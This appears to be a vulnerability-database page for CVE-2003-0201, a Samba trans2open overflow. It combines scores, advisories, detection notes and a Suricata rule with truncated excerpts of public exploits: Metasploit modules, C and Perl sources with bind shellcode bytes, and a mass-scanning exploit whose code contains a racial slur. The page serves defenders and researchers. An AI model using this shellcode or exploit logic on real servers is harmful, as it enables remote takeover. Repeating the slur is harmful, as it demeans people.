CVE-2003-0201
published 2003-05-05CVE-2003-0201: Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2…
PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
84.50%
99.7th percentile
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Affected
86 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90
bytes↗
linux_bindcode: \x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80...
bytes↗
exploit_data: \x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90
- →The exploit packet begins with the fixed 6-byte NetBIOS header \x00\x04\x08\x20 followed by \xff\x53\x4d\x42\x32 (SMB magic + trans2 command byte). Alert on this exact byte sequence on TCP/139. ↗
- →The exploit fills the buffer with 0x90 NOP sleds (3000 bytes) and inserts a short JMP (0xEB 0x70) at offset 1096/1097 of the buffer. Detecting a large NOP sled followed by a short JMP inside an SMBtrans2 payload is a strong indicator. ↗
- →The Metasploit BSD/Solaris variants overwrite the return address at a fixed offset (1055 for BSD, 1103 for Solaris) within a 1988-byte random-text pattern sent inside the SMBtrans2 request. Payload size of exactly 1988 bytes inside trans2 is a detection signal. ↗
- →The exploit authenticates anonymously (uid=100) before sending the malicious trans2 packet. Monitor for SMB session setup with uid=100 immediately followed by a large SMBtrans2 request on port 139. ↗
- →Connect-back shellcode uses hardcoded port 0xb0ef (45295 decimal). Monitor for outbound TCP connections from smbd to unexpected hosts on port 45295 after an inbound SMBtrans2 anomaly. ↗
- →The bind shellcode opens a listening shell on port 0xb0ef (45295). After exploitation, scan for unexpected listeners on TCP/45295 on Samba servers. ↗
- →The Mac OS X PPC Metasploit module brute-forces return addresses between 0xbffffdfc and 0xbfa00000 in steps of 512, sending repeated SMBtrans2 exploit packets. Repeated SMBtrans2 connections from the same source IP in rapid succession is a bruteforce indicator. ↗
- ·The vulnerability affects Samba versions 2.2.0 through 2.2.8 (and Samba-TNG 0.3.1 and earlier). Samba 2.2.8a and later are patched. Ensure version detection is scoped to this range to avoid false positives on patched installs. ↗
- ·The BSD Metasploit module notes it exploits systems 'that do not have the noexec stack option set' — systems with non-executable stack (e.g., OpenBSD 3.2 with W^X) require a different ROP/ret-into-libc approach and different return addresses, so detection signatures based on shellcode NOP sleds may not fire on those targets. ↗
- ·The exploit requires a successful SMB session setup (smb_login) before sending the malicious trans2 packet. Detection rules that only inspect unauthenticated traffic will miss the exploit payload. ↗
- ·CVE-2003-1332 (reply_nttrans overflow in Samba 2.2.7a and earlier) is explicitly a different vulnerability from CVE-2003-0201 (call_trans2open). Do not conflate detection signatures for the two; the attack vectors and SMB commands differ. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vulncheck10.0CRITICAL
vendor_debian10.0CRITICAL
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6mm7-g5cc-wpx6: Buffer overflow in the call_trans2open function in trans2
ghsa_unreviewed·2022-05-03
CVE-2003-0201 [HIGH] GHSA-6mm7-g5cc-wpx6: Buffer overflow in the call_trans2open function in trans2
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
GHSA
GHSA-m4pp-9j7g-g832: Multiple buffer overflows in Samba before 2
ghsa_unreviewed·2022-04-29·CVSS 10.0
CVE-2003-0196 [CRITICAL] GHSA-m4pp-9j7g-g832: Multiple buffer overflows in Samba before 2
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
GHSA
GHSA-g92c-j3f9-j6gh: Stack-based buffer overflow in the reply_nttrans function in Samba 2
ghsa_unreviewed·2022-04-29·CVSS 10.0
CVE-2003-1332 [CRITICAL] GHSA-g92c-j3f9-j6gh: Stack-based buffer overflow in the reply_nttrans function in Samba 2
Stack-based buffer overflow in the reply_nttrans function in Samba 2.2.7a and earlier allows remote attackers to execute arbitrary code via a crafted request, a different vulnerability than CVE-2003-0201.
OSV
CVE-2003-0196: Multiple buffer overflows in Samba before 2
osv·2003-05-05·CVSS 10.0
CVE-2003-0196 [CRITICAL] CVE-2003-0196: Multiple buffer overflows in Samba before 2
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
OSV
CVE-2003-0201: Buffer overflow in the call_trans2open function in trans2
osv·2003-05-05·CVSS 10.0
CVE-2003-0201 [CRITICAL] CVE-2003-0201: Buffer overflow in the call_trans2open function in trans2
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
VulnCheck
Samba Samba Out-of-bounds Write
vulncheck·2003·CVSS 10.0
CVE-2003-0201 [CRITICAL] Samba Samba Out-of-bounds Write
Samba Samba Out-of-bounds Write
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Affected: Samba Samba
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
Exploit PoC: https://vulncheck.com/xdb/bbe653fc30c4
Red Hat
security flaw
vendor_redhat·2003-04-07·CVSS 10.0
CVE-2003-0201 [CRITICAL] security flaw
security flaw
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Red Hat
security flaw
vendor_redhat·2003-04-07·CVSS 10.0
CVE-2003-0196 [CRITICAL] security flaw
security flaw
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
Debian
CVE-2003-1332: samba - Stack-based buffer overflow in the reply_nttrans function in Samba 2.2.7a and ea...
vendor_debian·2003·CVSS 10.0
CVE-2003-1332 [CRITICAL] CVE-2003-1332: samba - Stack-based buffer overflow in the reply_nttrans function in Samba 2.2.7a and ea...
Stack-based buffer overflow in the reply_nttrans function in Samba 2.2.7a and earlier allows remote attackers to execute arbitrary code via a crafted request, a different vulnerability than CVE-2003-0201.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
Debian
CVE-2003-0196: samba - Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to e...
vendor_debian·2003·CVSS 10.0
CVE-2003-0196 [CRITICAL] CVE-2003-0196: samba - Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to e...
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
Scope: local
bookworm: resolved (fixed in 3.0)
bullseye: resolved (fixed in 3.0)
forky: resolved (fixed in 3.0)
sid: resolved (fixed in 3.0)
trixie: resolved (fixed in 3.0)
Debian
CVE-2003-0201: samba - Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x befo...
vendor_debian·2003·CVSS 10.0
CVE-2003-0201 [CRITICAL] CVE-2003-0201: samba - Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x befo...
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Scope: local
bookworm: resolved (fixed in 3.0)
bullseye: resolved (fixed in 3.0)
forky: resolved (fixed in 3.0)
sid: resolved (fixed in 3.0)
trixie: resolved (fixed in 3.0)
Suricata
GPL NETBIOS SMB trans2open buffer overflow attempt
suricata·2010-09-23
CVE-2003-0201 GPL NETBIOS SMB trans2open buffer overflow attempt
GPL NETBIOS SMB trans2open buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB trans2open buffer overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|00 14|"; depth:2; offset:60; byte_test:2,>,256,0,relative,little; reference:bugtraq,7294; reference:cve,2003-0201; reference:url,www.digitaldefense.net/labs/advisories/DDI-1013.txt; classtype:attempted-admin; sid:2102103; rev:11; metadata:created_at 2010_09_23, cve CVE_2003_0201, confidence High, signature_severity Major, updated_at 2024_03_08;)
Exploit-DB
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-07-14
CVE-2003-0201 Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Linux x86)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on x86 Linux systems that do not
have the noexec stack option set.
NOTE: Some older versions of RedHat do not seem to be vulnerable
since they apparently do not allow anonymous
Exploit-DB
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-21
CVE-2003-0201 Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Solaris SPARC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on Solaris SPARC systems that do not
have the noexec stack option set. Big thanks to MC and
valsmith for resolving a problem with the beta version of
this module.
},
'A
Exploit-DB
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-21
CVE-2003-0201 Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Mac OS X PPC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm', 'jduck' ],
'Version' => '$Revision: 9571 $',
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294'
Exploit-DB
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-17
CVE-2003-0201 Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9552 2010-06-17 22:11:43Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (*BSD x86)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on x86 Linux systems that do not
have the noexec stack option set.
},
'Author' => [ 'hdm', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9552 $',
'References' =>
[
Exploit-DB
Samba 2.2.8 - Brute Force Method Remote Command Execution
exploitdb·2003-07-13
CVE-2003-0201 Samba 2.2.8 - Brute Force Method Remote Command Execution
Samba 2.2.8 - Brute Force Method Remote Command Execution
---
/*
* Mass Samba Exploit by Schizoprenic
* Xnuxer-Research (c) 2003
* This code just for eduction purpose
*/
#include
#include
#include
void usage(char *s)
{
printf("Usage: %s \n",s);
exit(-1);
}
int main(int argc, char **argv)
{
printf("Mass Samba Exploit by Schizoprenic\n");
if(argc != 3) usage(argv[0]);
scan(argv[1], argv[2]);
return 0;
}
int scan(char *fl, char *bind_ip)
{
FILE *nigger,*fstat;
char buf[512];
char cmd[100];
int i;
struct stat st;
if((nigger=fopen(fl,"r")) == NULL) {
fprintf(stderr,"File %s not found!\n", fl);
return -1;
}
while(fgets(buf,512,nigger) != NULL)
{
if(buf[strlen(buf)-1]=='\n') buf[strlen(buf)-1]=0;
for (i=0;itype = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->leng
Exploit-DB
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)
exploitdb·2003-05-12
CVE-2003-0201 Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
/*
* Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
* Using connect back method and brute force mode.
* I just create & modify
Exploit-DB
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)
exploitdb·2003-04-11
CVE-2003-0201 Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
/*
**
** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** 11/Apr/2003
** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c
Exploit-DB
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
exploitdb·2003-04-10
CVE-2003-0201 Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
Samba
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef struct {
unsigned char type;
unsigned char flags;
unsigned short length;
} NETBIOS_HEADER;
typedef struct {
unsigned char protocol[4];
unsigned char command;
unsigned short status;
unsigned char reserved;
unsigned char flags;
unsigned short flags2;
unsigned char pad[12];
unsigned short tid;
unsigned short pid;
unsigned short uid;
unsigned short mid;
} SMB_HEADER;
int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;
char linux_bindcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53
Exploit-DB
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)
exploitdb·2003-04-07
CVE-2003-0201 Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)
Samba 2.2.0 'Samba trans2open Overflow (Mac OS X)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'BID', '7294'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Targets' =>
[
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
],
'DisclosureDate' => 'Apr 7 2003',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(139)
], self.class)
end
# Need to perform
Exploit-DB
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)
exploitdb·2003-04-07
CVE-2003-0201 Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)
---
source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22471.tar.gz
Exploit-DB
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)
exploitdb·2003-04-07
CVE-2003-0201 Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)
---
/*
source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/78/files
*/
/* 0x333hate => samba 2.2.x remote root exploit
*
*
Exploit-DB
Samba 2.2.x - Remote Buffer Overflow
exploitdb·2003-04-07
CVE-2003-0201 Samba 2.2.x - Remote Buffer Overflow
Samba 2.2.x - Remote Buffer Overflow
---
#!/usr/bin/perl
###############
##[ Header
# Name: trans2root.pl
# Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow)
# Author: H D Moore
# Copyright: Copyright (C) 2003 Digital Defense Inc.
# trans2root.pl -t -H -h
##
use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;
$SIG{USR2} = \&GoAway;
my %args;
my %targets =
(
"linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
"solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
"fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
# name # default # start # end # step # function
);
getopt('t:M:h:p:r:H:P:', \%args);
my $target_type = $args{t} || Usage();
my $target_host =
Metasploit
Samba trans2open Overflow (Mac OS X PPC)
metasploit
Samba trans2open Overflow (Mac OS X PPC)
Samba trans2open Overflow (Mac OS X PPC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.
Metasploit
Samba trans2open Overflow (Solaris SPARC)
metasploit
Samba trans2open Overflow (Solaris SPARC)
Samba trans2open Overflow (Solaris SPARC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.
Metasploit
Samba trans2open Overflow (Linux x86)
metasploit
Samba trans2open Overflow (Linux x86)
Samba trans2open Overflow (Linux x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.
Metasploit
Samba trans2open Overflow (*BSD x86)
metasploit
Samba trans2open Overflow (*BSD x86)
Samba trans2open Overflow (*BSD x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set.
Bugzilla
CVE-2003-0196 security flaw
bugzilla·2018-08-16·CVSS 10.0
CVE-2003-0196 [CRITICAL] CVE-2003-0196 security flaw
CVE-2003-0196 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
Bugzilla
CVE-2003-0201 security flaw
bugzilla·2018-08-16·CVSS 10.0
CVE-2003-0201 [CRITICAL] CVE-2003-0201 security flaw
CVE-2003-0201 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
ftp://patches.sgi.com/support/free/security/advisories/20030403-01-Phttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000624http://marc.info/?l=bugtraq&m=104972664226781&w=2http://marc.info/?l=bugtraq&m=104974612519064&w=2http://marc.info/?l=bugtraq&m=104981682014565&w=2http://marc.info/?l=bugtraq&m=104994564212488&w=2http://www.debian.org/security/2003/dsa-280http://www.digitaldefense.net/labs/advisories/DDI-1013.txthttp://www.kb.cert.org/vuls/id/267873http://www.mandriva.com/security/advisories?name=MDKSA-2003:044http://www.novell.com/linux/security/advisories/2003_025_samba.htmlhttp://www.redhat.com/support/errata/RHSA-2003-137.htmlhttp://www.securityfocus.com/bid/7294https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2163https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A567ftp://patches.sgi.com/support/free/security/advisories/20030403-01-Phttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000624http://marc.info/?l=bugtraq&m=104972664226781&w=2http://marc.info/?l=bugtraq&m=104974612519064&w=2http://marc.info/?l=bugtraq&m=104981682014565&w=2http://marc.info/?l=bugtraq&m=104994564212488&w=2http://www.debian.org/security/2003/dsa-280http://www.digitaldefense.net/labs/advisories/DDI-1013.txthttp://www.kb.cert.org/vuls/id/267873http://www.mandriva.com/security/advisories?name=MDKSA-2003:044http://www.novell.com/linux/security/advisories/2003_025_samba.htmlhttp://www.redhat.com/support/errata/RHSA-2003-137.htmlhttp://www.securityfocus.com/bid/7294https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2163https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A567
2003-05-05
Published
Exploited in the wild